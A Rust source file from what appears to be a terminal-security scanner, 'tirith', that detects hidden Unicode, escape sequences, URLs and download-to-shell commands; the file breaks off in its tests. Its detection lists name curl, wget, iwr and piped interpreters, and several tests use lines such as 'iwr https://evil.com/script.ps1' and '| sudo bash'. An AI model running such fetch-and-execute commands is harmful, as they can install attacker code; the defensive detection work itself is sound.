tirith_core/
extract.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7/// Context for Tier 1 scanning.
8#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10    /// Exec-time: command about to be executed (check subcommand).
11    Exec,
12    /// Paste-time: content being pasted (paste subcommand).
13    Paste,
14    /// File scan: content read from a file (scan subcommand).
15    /// Skips tier-1 fast-exit, runs byte scan + configfile rules only.
16    FileScan,
17}
18
19// Include generated Tier 1 patterns from build.rs declarative pattern table.
20#[allow(dead_code)]
21mod tier1_generated {
22    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
23}
24
25/// Expose the build-time extractor IDs for test-time cross-referencing.
26pub fn extractor_ids() -> &'static [&'static str] {
27    tier1_generated::EXTRACTOR_IDS
28}
29
30/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
31static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
32    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
33});
34
35/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
36static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
37    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
38});
39
40/// Standard URL extraction regex for Tier 3.
41static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
42    Regex::new(
43        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
44    )
45    .expect("url regex must compile")
46});
47
48/// Control character patterns for paste-time byte scanning.
49pub struct ByteScanResult {
50    pub has_ansi_escapes: bool,
51    pub has_control_chars: bool,
52    pub has_bidi_controls: bool,
53    pub has_zero_width: bool,
54    pub has_invalid_utf8: bool,
55    pub has_unicode_tags: bool,
56    pub has_variation_selectors: bool,
57    pub has_invisible_math_operators: bool,
58    pub has_invisible_whitespace: bool,
59    pub details: Vec<ByteFinding>,
60}
61
62pub struct ByteFinding {
63    pub offset: usize,
64    pub byte: u8,
65    /// Full Unicode codepoint for multi-byte characters (None for single-byte findings).
66    pub codepoint: Option<u32>,
67    pub description: String,
68}
69
70/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
71pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
72    match context {
73        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
74        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
75        // FileScan always proceeds to tier-3 (no fast-exit)
76        ScanContext::FileScan => true,
77    }
78}
79
80/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
81pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
82    let mut result = ByteScanResult {
83        has_ansi_escapes: false,
84        has_control_chars: false,
85        has_bidi_controls: false,
86        has_zero_width: false,
87        has_invalid_utf8: false,
88        has_unicode_tags: false,
89        has_variation_selectors: false,
90        has_invisible_math_operators: false,
91        has_invisible_whitespace: false,
92        details: Vec::new(),
93    };
94
95    // Check for invalid UTF-8
96    if std::str::from_utf8(input).is_err() {
97        result.has_invalid_utf8 = true;
98    }
99
100    let len = input.len();
101    let mut i = 0;
102    while i < len {
103        let b = input[i];
104
105        // Escape sequences: CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP)
106        if b == 0x1b {
107            if i + 1 < len {
108                let next = input[i + 1];
109                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
110                    result.has_ansi_escapes = true;
111                    result.details.push(ByteFinding {
112                        offset: i,
113                        byte: b,
114                        codepoint: None,
115                        description: match next {
116                            b'[' => "CSI escape sequence",
117                            b']' => "OSC escape sequence",
118                            b'_' => "APC escape sequence",
119                            b'P' => "DCS escape sequence",
120                            _ => "escape sequence",
121                        }
122                        .to_string(),
123                    });
124                    i += 2;
125                    continue;
126                }
127            } else {
128                // Trailing lone ESC
129                result.has_ansi_escapes = true;
130                result.details.push(ByteFinding {
131                    offset: i,
132                    byte: b,
133                    codepoint: None,
134                    description: "trailing escape byte".to_string(),
135                });
136            }
137        }
138
139        // Control characters (< 0x20, excluding common whitespace and ESC)
140        // For \r: only flag when followed by non-\n (display-overwriting attack).
141        // Trailing \r and \r\n (Windows line endings) are benign clipboard artifacts.
142        if b == b'\r' {
143            let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
144            if is_attack_cr {
145                result.has_control_chars = true;
146                result.details.push(ByteFinding {
147                    offset: i,
148                    byte: b,
149                    codepoint: None,
150                    description: format!("control character 0x{b:02x}"),
151                });
152            }
153        } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
154            result.has_control_chars = true;
155            result.details.push(ByteFinding {
156                offset: i,
157                byte: b,
158                codepoint: None,
159                description: format!("control character 0x{b:02x}"),
160            });
161        }
162
163        // DEL character
164        if b == 0x7F {
165            result.has_control_chars = true;
166            result.details.push(ByteFinding {
167                offset: i,
168                byte: b,
169                codepoint: None,
170                description: "control character 0x7f (DEL)".to_string(),
171            });
172        }
173
174        // Check for UTF-8 multi-byte sequences that are bidi or zero-width
175        if b >= 0xc0 {
176            // Try to decode UTF-8 character
177            let remaining = &input[i..];
178            if let Some(ch) = std::str::from_utf8(remaining)
179                .ok()
180                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
181                .and_then(|s| s.chars().next())
182            {
183                // Bidi controls
184                if is_bidi_control(ch) {
185                    result.has_bidi_controls = true;
186                    result.details.push(ByteFinding {
187                        offset: i,
188                        byte: b,
189                        codepoint: Some(ch as u32),
190                        description: format!("bidi control U+{:04X}", ch as u32),
191                    });
192                }
193                // Zero-width characters (ZWSP, ZWNJ, ZWJ, BOM, CGJ, Soft Hyphen, Word Joiner)
194                // BOM (U+FEFF) at offset 0 is a file-encoding artifact, not an attack
195                if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
196                    result.has_zero_width = true;
197                    result.details.push(ByteFinding {
198                        offset: i,
199                        byte: b,
200                        codepoint: Some(ch as u32),
201                        description: format!("zero-width character U+{:04X}", ch as u32),
202                    });
203                }
204                // Unicode Tags (hidden ASCII encoding) U+E0000–U+E007F
205                if is_unicode_tag(ch) {
206                    result.has_unicode_tags = true;
207                    result.details.push(ByteFinding {
208                        offset: i,
209                        byte: b,
210                        codepoint: Some(ch as u32),
211                        description: format!("unicode tag U+{:04X}", ch as u32),
212                    });
213                }
214                // Variation selectors: U+FE00–U+FE0F and U+E0100–U+E01EF
215                if is_variation_selector(ch) {
216                    result.has_variation_selectors = true;
217                    result.details.push(ByteFinding {
218                        offset: i,
219                        byte: b,
220                        codepoint: Some(ch as u32),
221                        description: format!("variation selector U+{:04X}", ch as u32),
222                    });
223                }
224                // Invisible math operators U+2061–U+2064
225                if is_invisible_math_operator(ch) {
226                    result.has_invisible_math_operators = true;
227                    result.details.push(ByteFinding {
228                        offset: i,
229                        byte: b,
230                        codepoint: Some(ch as u32),
231                        description: format!("invisible math operator U+{:04X}", ch as u32),
232                    });
233                }
234                // Invisible whitespace: Hair Space, Thin Space, Narrow No-Break Space
235                if is_invisible_whitespace(ch) {
236                    result.has_invisible_whitespace = true;
237                    result.details.push(ByteFinding {
238                        offset: i,
239                        byte: b,
240                        codepoint: Some(ch as u32),
241                        description: format!("invisible whitespace U+{:04X}", ch as u32),
242                    });
243                }
244                i += ch.len_utf8();
245                continue;
246            }
247        }
248
249        i += 1;
250    }
251
252    result
253}
254
255/// Check if a character is a bidi control.
256fn is_bidi_control(ch: char) -> bool {
257    matches!(
258        ch,
259        '\u{200E}' // LRM
260        | '\u{200F}' // RLM
261        | '\u{202A}' // LRE
262        | '\u{202B}' // RLE
263        | '\u{202C}' // PDF
264        | '\u{202D}' // LRO
265        | '\u{202E}' // RLO
266        | '\u{2066}' // LRI
267        | '\u{2067}' // RLI
268        | '\u{2068}' // FSI
269        | '\u{2069}' // PDI
270    )
271}
272
273/// Check if a character is zero-width.
274fn is_zero_width(ch: char) -> bool {
275    matches!(
276        ch,
277        '\u{200B}' // ZWSP
278        | '\u{200C}' // ZWNJ
279        | '\u{200D}' // ZWJ
280        | '\u{FEFF}' // BOM / ZWNBSP
281        | '\u{034F}' // Combining Grapheme Joiner
282        | '\u{00AD}' // Soft Hyphen
283        | '\u{2060}' // Word Joiner
284    )
285}
286
287/// Check if a character is a Unicode Tag (hidden ASCII encoding).
288fn is_unicode_tag(ch: char) -> bool {
289    ('\u{E0000}'..='\u{E007F}').contains(&ch)
290}
291
292/// Check if a character is a variation selector.
293fn is_variation_selector(ch: char) -> bool {
294    // VS1-16
295    ('\u{FE00}'..='\u{FE0F}').contains(&ch)
296    // VS17-256 (Supplementary)
297    || ('\u{E0100}'..='\u{E01EF}').contains(&ch)
298}
299
300/// Check if a character is an invisible math operator.
301fn is_invisible_math_operator(ch: char) -> bool {
302    // Function Application, Invisible Times, Invisible Separator, Invisible Plus
303    ('\u{2061}'..='\u{2064}').contains(&ch)
304}
305
306/// Check if a character is an invisible whitespace variant.
307fn is_invisible_whitespace(ch: char) -> bool {
308    matches!(
309        ch,
310        '\u{200A}' // Hair Space
311        | '\u{2009}' // Thin Space
312        | '\u{202F}' // Narrow No-Break Space
313    )
314}
315
316/// Tier 3: Extract URL-like patterns from a command string.
317/// Uses shell-aware tokenization, then extracts URLs from each segment.
318pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
319    let segments = tokenize::tokenize(input, shell);
320    let mut results = Vec::new();
321
322    for (seg_idx, segment) in segments.iter().enumerate() {
323        let sink_context = is_sink_context(segment, &segments);
324        let resolved = resolve_segment_command(segment);
325
326        // Extract standard URLs from command + args plus leading env-assignment values.
327        // Keep the raw-text expansion targeted so output/auth false-positive suppression
328        // still applies to the command/arg path.
329        let mut url_sources: Vec<&str> = Vec::new();
330        if let Some(ref cmd) = segment.command {
331            url_sources.push(cmd.as_str());
332        }
333        for arg in &segment.args {
334            url_sources.push(arg.as_str());
335        }
336        for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
337            if ignores_env_assignment_url(&name) {
338                continue;
339            }
340            let clean = strip_quotes(&value);
341            if !clean.is_empty() {
342                push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
343            }
344        }
345        for source in &url_sources {
346            push_urls_from_source(source, seg_idx, sink_context, &mut results);
347        }
348
349        // Check for schemeless URLs in sink contexts
350        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
351        let is_docker_cmd = resolved
352            .as_ref()
353            .is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
354        if sink_context && !is_docker_cmd {
355            if let Some(cmd) = resolved.as_ref() {
356                for (arg_idx, arg) in cmd.args.iter().enumerate() {
357                    // Skip args that are output-file flag values
358                    if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
359                        continue;
360                    }
361                    let clean = strip_quotes(arg);
362                    if is_remote_copy_target(&cmd.name, &clean) {
363                        continue;
364                    }
365                    if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
366                        results.push(ExtractedUrl {
367                            raw: clean.clone(),
368                            parsed: UrlLike::SchemelessHostPath {
369                                host: extract_host_from_schemeless(&clean),
370                                path: extract_path_from_schemeless(&clean),
371                            },
372                            segment_index: seg_idx,
373                            in_sink_context: true,
374                        });
375                    }
376                }
377            }
378        }
379
380        // Check for Docker refs in docker commands
381        if let Some(cmd) = resolved.as_ref() {
382            if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
383                if let Some(docker_subcmd) = cmd.args.first() {
384                    let subcmd_lower = docker_subcmd.to_lowercase();
385                    if subcmd_lower == "build" {
386                        // For build, only -t/--tag values are image refs
387                        let mut i = 1;
388                        while i < cmd.args.len() {
389                            let arg = strip_quotes(&cmd.args[i]);
390                            if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
391                                let tag_val = strip_quotes(&cmd.args[i + 1]);
392                                if !tag_val.is_empty() {
393                                    let docker_url = parse::parse_docker_ref(&tag_val);
394                                    results.push(ExtractedUrl {
395                                        raw: tag_val,
396                                        parsed: docker_url,
397                                        segment_index: seg_idx,
398                                        in_sink_context: true,
399                                    });
400                                }
401                                i += 2;
402                            } else if arg.starts_with("-t") && arg.len() > 2 {
403                                let tag_val = strip_quotes(&arg[2..]);
404                                let docker_url = parse::parse_docker_ref(&tag_val);
405                                results.push(ExtractedUrl {
406                                    raw: tag_val,
407                                    parsed: docker_url,
408                                    segment_index: seg_idx,
409                                    in_sink_context: true,
410                                });
411                                i += 1;
412                            } else if let Some(val) = arg.strip_prefix("--tag=") {
413                                let tag_val = strip_quotes(val);
414                                let docker_url = parse::parse_docker_ref(&tag_val);
415                                results.push(ExtractedUrl {
416                                    raw: tag_val,
417                                    parsed: docker_url,
418                                    segment_index: seg_idx,
419                                    in_sink_context: true,
420                                });
421                                i += 1;
422                            } else {
423                                i += 1;
424                            }
425                        }
426                    } else if subcmd_lower == "image" {
427                        // docker image pull/push/inspect — actual subcmd is args[1]
428                        if let Some(image_subcmd) = cmd.args.get(1) {
429                            let image_subcmd_lower = image_subcmd.to_lowercase();
430                            if matches!(
431                                image_subcmd_lower.as_str(),
432                                "pull" | "push" | "inspect" | "rm" | "tag"
433                            ) {
434                                extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
435                            }
436                        }
437                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
438                        // First non-flag arg is image, then stop
439                        extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
440                    }
441                }
442            }
443        }
444    }
445
446    results
447}
448
449/// An extracted URL with context.
450#[derive(Debug, Clone)]
451pub struct ExtractedUrl {
452    pub raw: String,
453    pub parsed: UrlLike,
454    pub segment_index: usize,
455    pub in_sink_context: bool,
456}
457
458/// Common value-taking flags across docker subcommands.
459const DOCKER_VALUE_FLAGS: &[&str] = &[
460    "--platform",
461    "--format",
462    "--filter",
463    "-f",
464    "--label",
465    "-l",
466    "--name",
467    "--hostname",
468    "--user",
469    "-u",
470    "--workdir",
471    "-w",
472    "--network",
473    "--net",
474    "--env",
475    "-e",
476    "--env-file",
477    "--publish",
478    "-p",
479    "--expose",
480    "--volume",
481    "-v",
482    "--mount",
483    "--add-host",
484    "--device",
485    "--entrypoint",
486    "--log-driver",
487    "--log-opt",
488    "--restart",
489    "--runtime",
490    "--cpus",
491    "--cpu-shares",
492    "--cpu-quota",
493    "--memory",
494    "--memory-reservation",
495    "--memory-swap",
496    "--shm-size",
497    "--ulimit",
498    "--security-opt",
499    "--sysctl",
500    "--tmpfs",
501    "--gpus",
502    "--ipc",
503    "--pid",
504    "--userns",
505    "--cgroupns",
506];
507
508/// Short flags that may embed their value inline (e.g., -p8080:80).
509const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
510
511/// Extract the first non-flag argument as a Docker image reference.
512fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
513    let mut skip_next = false;
514    let mut end_of_options = false;
515    for arg in args {
516        if skip_next {
517            skip_next = false;
518            continue;
519        }
520        let clean = strip_quotes(arg);
521        if clean == "--" {
522            end_of_options = true;
523            continue;
524        }
525        if !end_of_options && clean.starts_with("--") && clean.contains('=') {
526            continue; // --flag=value, skip
527        }
528        if !end_of_options && clean.starts_with('-') {
529            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
530                skip_next = true;
531            }
532            if DOCKER_VALUE_PREFIXES
533                .iter()
534                .any(|p| clean.starts_with(p) && clean.len() > p.len())
535            {
536                continue;
537            }
538            continue;
539        }
540        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
541            let docker_url = parse::parse_docker_ref(&clean);
542            results.push(ExtractedUrl {
543                raw: clean,
544                parsed: docker_url,
545                segment_index: seg_idx,
546                in_sink_context: true,
547            });
548        }
549        break; // Only first non-flag arg is the image
550    }
551}
552
553#[derive(Debug, Clone)]
554struct ResolvedCommand<'a> {
555    name: String,
556    args: &'a [String],
557}
558
559fn push_urls_from_source(
560    source: &str,
561    segment_index: usize,
562    in_sink_context: bool,
563    results: &mut Vec<ExtractedUrl>,
564) {
565    for mat in URL_REGEX.find_iter(source) {
566        let raw = mat.as_str().to_string();
567        let url = parse::parse_url(&raw);
568        results.push(ExtractedUrl {
569            raw,
570            parsed: url,
571            segment_index,
572            in_sink_context,
573        });
574    }
575}
576
577fn ignores_env_assignment_url(name: &str) -> bool {
578    let upper = name.to_ascii_uppercase();
579    upper == "NO_PROXY" || upper.ends_with("_PROXY")
580}
581
582fn env_long_flag_takes_value(flag: &str) -> bool {
583    let name = flag.split_once('=').map(|(name, _)| name).unwrap_or(flag);
584    matches!(name, "--unset" | "--chdir" | "--split-string")
585}
586
587fn command_base_name(raw: &str) -> String {
588    let clean = strip_quotes(raw);
589    clean
590        .rsplit(['/', '\\'])
591        .next()
592        .unwrap_or(clean.as_str())
593        .to_lowercase()
594}
595
596fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
597    let command = segment.command.as_ref()?;
598    resolve_named_command(command, &segment.args)
599}
600
601fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
602    let name = command_base_name(command);
603    match name.as_str() {
604        "env" => resolve_env_command(args),
605        "command" => resolve_command_wrapper(args),
606        "time" => resolve_time_wrapper(args),
607        "tirith" => resolve_tirith_command(args),
608        _ => Some(ResolvedCommand { name, args }),
609    }
610}
611
612fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
613    let mut i = 0;
614    while i < args.len() {
615        let clean = strip_quotes(&args[i]);
616        if clean == "--" {
617            i += 1;
618            break;
619        }
620        if tokenize::is_env_assignment(&clean) {
621            i += 1;
622            continue;
623        }
624        if clean.starts_with('-') {
625            if clean.starts_with("--") {
626                if env_long_flag_takes_value(&clean) && !clean.contains('=') {
627                    i += 2;
628                } else {
629                    i += 1;
630                }
631                continue;
632            }
633            if clean == "-u" || clean == "-C" || clean == "-S" {
634                i += 2;
635                continue;
636            }
637            i += 1;
638            continue;
639        }
640        return resolve_named_command(&clean, &args[i + 1..]);
641    }
642
643    while i < args.len() {
644        let clean = strip_quotes(&args[i]);
645        if tokenize::is_env_assignment(&clean) {
646            i += 1;
647            continue;
648        }
649        return resolve_named_command(&clean, &args[i + 1..]);
650    }
651
652    None
653}
654
655fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
656    let mut i = 0;
657    while i < args.len() {
658        let clean = strip_quotes(&args[i]);
659        if clean == "--" {
660            i += 1;
661            break;
662        }
663        if clean.starts_with('-') {
664            i += 1;
665            continue;
666        }
667        break;
668    }
669    args.get(i)
670        .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
671}
672
673fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
674    let mut i = 0;
675    while i < args.len() {
676        let clean = strip_quotes(&args[i]);
677        if clean == "--" {
678            i += 1;
679            break;
680        }
681        if clean.starts_with('-') {
682            if clean == "-f" || clean == "--format" || clean == "-o" || clean == "--output" {
683                i += 2;
684            } else {
685                i += 1;
686            }
687            continue;
688        }
689        break;
690    }
691    args.get(i)
692        .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
693}
694
695fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
696    let subcommand = args.first().map(|arg| command_base_name(arg))?;
697    match subcommand.as_str() {
698        "run" => Some(ResolvedCommand {
699            name: "tirith-run".to_string(),
700            args: &args[1..],
701        }),
702        _ => Some(ResolvedCommand {
703            name: "tirith".to_string(),
704            args,
705        }),
706    }
707}
708
709/// Check if a segment is in a "sink" context (executing/downloading).
710fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
711    if let Some(cmd) = resolve_segment_command(segment) {
712        let cmd_lower = cmd.name;
713        // git is only a sink for download subcommands (clone, fetch, pull, etc.)
714        if cmd_lower == "git" {
715            return is_git_sink(cmd.args);
716        }
717        if is_source_command(&cmd_lower) {
718            return true;
719        }
720    }
721
722    // Check if this segment pipes into a sink
723    if let Some(sep) = &segment.preceding_separator {
724        if sep == "|" || sep == "|&" {
725            // This segment receives piped input — check if it's an interpreter
726            if let Some(cmd) = resolve_segment_command(segment) {
727                if is_interpreter(&cmd.name) {
728                    return true;
729                }
730            }
731        }
732    }
733
734    false
735}
736
737fn is_source_command(cmd: &str) -> bool {
738    matches!(
739        cmd,
740        "curl"
741            | "wget"
742            | "http"
743            | "https"
744            | "xh"
745            | "fetch"
746            | "scp"
747            | "rsync"
748            | "docker"
749            | "podman"
750            | "nerdctl"
751            | "pip"
752            | "pip3"
753            | "npm"
754            | "npx"
755            | "yarn"
756            | "pnpm"
757            | "go"
758            | "cargo"
759            | "iwr"
760            | "irm"
761            | "invoke-webrequest"
762            | "invoke-restmethod"
763            | "tirith-run"
764    )
765}
766
767fn is_remote_copy_target(cmd: &str, arg: &str) -> bool {
768    if !matches!(cmd, "scp" | "rsync") {
769        return false;
770    }
771
772    if let Some(at_pos) = arg.find('@') {
773        let before_at = &arg[..at_pos];
774        let after_at = &arg[at_pos + 1..];
775        return !before_at.contains(':') && !after_at.contains('/') && !after_at.contains(':');
776    }
777
778    false
779}
780
781/// Check if a git command is in a sink context (only subcommands that download).
782/// `git add`, `git commit`, `git status`, etc. are NOT sinks.
783fn is_git_sink(args: &[String]) -> bool {
784    if args.is_empty() {
785        return false;
786    }
787    // First non-flag arg is the subcommand
788    for arg in args {
789        let clean = strip_quotes(arg);
790        if clean.starts_with('-') {
791            continue;
792        }
793        return matches!(
794            clean.as_str(),
795            "clone" | "fetch" | "pull" | "submodule" | "remote"
796        );
797    }
798    false
799}
800
801fn is_interpreter(cmd: &str) -> bool {
802    matches!(
803        cmd,
804        "sh" | "bash"
805            | "zsh"
806            | "dash"
807            | "ksh"
808            | "python"
809            | "python3"
810            | "node"
811            | "perl"
812            | "ruby"
813            | "php"
814            | "iex"
815            | "invoke-expression"
816    )
817}
818
819/// Check if an arg at the given index is the value of an output-file or credential flag
820/// for the given command. Returns true if this arg should be skipped during schemeless
821/// URL detection (output filenames and auth credentials can look like domains).
822fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
823    let cmd_lower = cmd.to_lowercase();
824    let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
825
826    match cmd_base {
827        "curl" => {
828            if arg_index > 0 {
829                let prev = strip_quotes(&args[arg_index - 1]);
830                if prev == "-o"
831                    || prev == "--output"
832                    || prev == "-u"
833                    || prev == "--user"
834                    || prev == "-U"
835                    || prev == "--proxy-user"
836                {
837                    return true;
838                }
839            }
840            let current = strip_quotes(&args[arg_index]);
841            if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
842                return true;
843            }
844            if current.starts_with("--output=")
845                || current.starts_with("--user=")
846                || current.starts_with("--proxy-user=")
847            {
848                return true;
849            }
850            false
851        }
852        "wget" => {
853            if arg_index > 0 {
854                let prev = strip_quotes(&args[arg_index - 1]);
855                if prev == "-O"
856                    || prev == "--output-document"
857                    || prev == "--user"
858                    || prev == "--password"
859                    || prev == "--http-user"
860                    || prev == "--http-password"
861                    || prev == "--ftp-user"
862                    || prev == "--ftp-password"
863                    || prev == "--proxy-user"
864                    || prev == "--proxy-password"
865                {
866                    return true;
867                }
868            }
869            let current = strip_quotes(&args[arg_index]);
870            if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
871                return true;
872            }
873            if current.starts_with("--output-document=")
874                || current.starts_with("--user=")
875                || current.starts_with("--password=")
876                || current.starts_with("--http-user=")
877                || current.starts_with("--http-password=")
878                || current.starts_with("--ftp-user=")
879                || current.starts_with("--ftp-password=")
880                || current.starts_with("--proxy-user=")
881                || current.starts_with("--proxy-password=")
882            {
883                return true;
884            }
885            false
886        }
887        "http" | "https" | "xh" => {
888            if arg_index > 0 {
889                let prev = strip_quotes(&args[arg_index - 1]);
890                if prev == "-a" || prev == "--auth" {
891                    return true;
892                }
893            }
894            let current = strip_quotes(&args[arg_index]);
895            if current.starts_with("--auth=") {
896                return true;
897            }
898            false
899        }
900        _ => false,
901    }
902}
903
904fn strip_quotes(s: &str) -> String {
905    let s = s.trim();
906    if s.len() >= 2
907        && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
908    {
909        s[1..s.len() - 1].to_string()
910    } else {
911        s.to_string()
912    }
913}
914
915fn looks_like_schemeless_host(s: &str) -> bool {
916    // Must contain a dot, not start with -, not be a flag
917    if s.starts_with('-') || !s.contains('.') {
918        return false;
919    }
920    // Dotfiles and hidden files (e.g., .gitignore, .env.example) are not URLs
921    if s.starts_with('.') {
922        return false;
923    }
924    // First component before / or end should look like a domain
925    let host_part = s.split('/').next().unwrap_or(s);
926    if !host_part.contains('.') || host_part.contains(' ') {
927        return false;
928    }
929    // Exclude args where the host part looks like a file (e.g., "install.sh")
930    // BUT only when there is no meaningful path component — if there IS a non-empty
931    // path (e.g., evil.zip/payload), the host part is likely a real domain even if its
932    // TLD overlaps a file extension. A trailing slash alone (file.sh/) does NOT count
933    // as a meaningful path — it's still a filename, not a domain.
934    let host_lower = host_part.to_lowercase();
935    let has_meaningful_path = s.find('/').is_some_and(|idx| {
936        let after_slash = &s[idx + 1..];
937        !after_slash.is_empty() && after_slash != "/"
938    });
939    if !has_meaningful_path {
940        let file_exts = [
941            ".sh",
942            ".py",
943            ".rb",
944            ".js",
945            ".ts",
946            ".go",
947            ".rs",
948            ".c",
949            ".h",
950            ".txt",
951            ".md",
952            ".json",
953            ".yaml",
954            ".yml",
955            ".xml",
956            ".html",
957            ".css",
958            ".tar.gz",
959            ".tar.bz2",
960            ".tar.xz",
961            ".tgz",
962            ".zip",
963            ".gz",
964            ".bz2",
965            ".rpm",
966            ".deb",
967            ".pkg",
968            ".dmg",
969            ".exe",
970            ".msi",
971            ".dll",
972            ".so",
973            ".log",
974            ".conf",
975            ".cfg",
976            ".ini",
977            ".toml",
978            ".png",
979            ".jpg",
980            ".jpeg",
981            ".gif",
982            ".bmp",
983            ".ico",
984            ".tiff",
985            ".tif",
986            ".pdf",
987            ".csv",
988            ".mp3",
989            ".mp4",
990            ".wav",
991            ".avi",
992            ".mkv",
993            ".flac",
994            ".ogg",
995            ".webm",
996            ".ttf",
997            ".otf",
998            ".woff",
999            ".woff2",
1000            ".docx",
1001            ".xlsx",
1002            ".pptx",
1003            ".sqlite",
1004            ".lock",
1005            ".example",
1006            ".local",
1007            ".bak",
1008            ".tmp",
1009            ".swp",
1010            ".orig",
1011            ".patch",
1012            ".diff",
1013            ".map",
1014            ".env",
1015            ".sample",
1016            ".dist",
1017            ".editorconfig",
1018        ];
1019        if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
1020            return false;
1021        }
1022    }
1023    // Must have at least 2 labels (e.g., "example.com" not just "file.txt")
1024    let labels: Vec<&str> = host_part.split('.').collect();
1025    if labels.len() < 2 {
1026        return false;
1027    }
1028    // Last label (TLD) should be 2-63 alphabetic chars (DNS label max)
1029    let tld = labels.last().unwrap();
1030    tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
1031}
1032
1033fn extract_host_from_schemeless(s: &str) -> String {
1034    s.split('/').next().unwrap_or(s).to_string()
1035}
1036
1037fn extract_path_from_schemeless(s: &str) -> String {
1038    if let Some(idx) = s.find('/') {
1039        s[idx..].to_string()
1040    } else {
1041        String::new()
1042    }
1043}
1044
1045#[cfg(test)]
1046mod tests {
1047    use super::*;
1048
1049    #[test]
1050    fn test_tier1_exec_matches_url() {
1051        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
1052    }
1053
1054    #[test]
1055    fn test_tier1_exec_no_match_simple() {
1056        assert!(!tier1_scan("ls -la", ScanContext::Exec));
1057    }
1058
1059    #[test]
1060    fn test_tier1_exec_no_match_echo() {
1061        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
1062    }
1063
1064    #[test]
1065    fn test_tier1_exec_matches_pipe_bash() {
1066        assert!(tier1_scan("something | bash", ScanContext::Exec));
1067    }
1068
1069    #[test]
1070    fn test_tier1_exec_matches_pipe_sudo_bash() {
1071        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
1072    }
1073
1074    #[test]
1075    fn test_tier1_exec_matches_pipe_env_bash() {
1076        assert!(tier1_scan("something | env bash", ScanContext::Exec));
1077    }
1078
1079    #[test]
1080    fn test_tier1_exec_matches_pipe_bin_bash() {
1081        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
1082    }
1083
1084    #[test]
1085    fn test_tier1_exec_matches_git_scp() {
1086        assert!(tier1_scan(
1087            "git clone git@github.com:user/repo",
1088            ScanContext::Exec
1089        ));
1090    }
1091
1092    #[test]
1093    fn test_tier1_exec_matches_punycode() {
1094        assert!(tier1_scan(
1095            "curl https://xn--example-cua.com",
1096            ScanContext::Exec
1097        ));
1098    }
1099
1100    #[test]
1101    fn test_tier1_exec_matches_docker() {
1102        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
1103    }
1104
1105    #[test]
1106    fn test_tier1_exec_matches_iwr() {
1107        assert!(tier1_scan(
1108            "iwr https://evil.com/script.ps1",
1109            ScanContext::Exec
1110        ));
1111    }
1112
1113    #[test]
1114    fn test_tier1_exec_matches_curl() {
1115        assert!(tier1_scan(
1116            "curl https://example.com/install.sh",
1117            ScanContext::Exec
1118        ));
1119    }
1120
1121    #[test]
1122    fn test_tier1_exec_matches_lookalike_tld() {
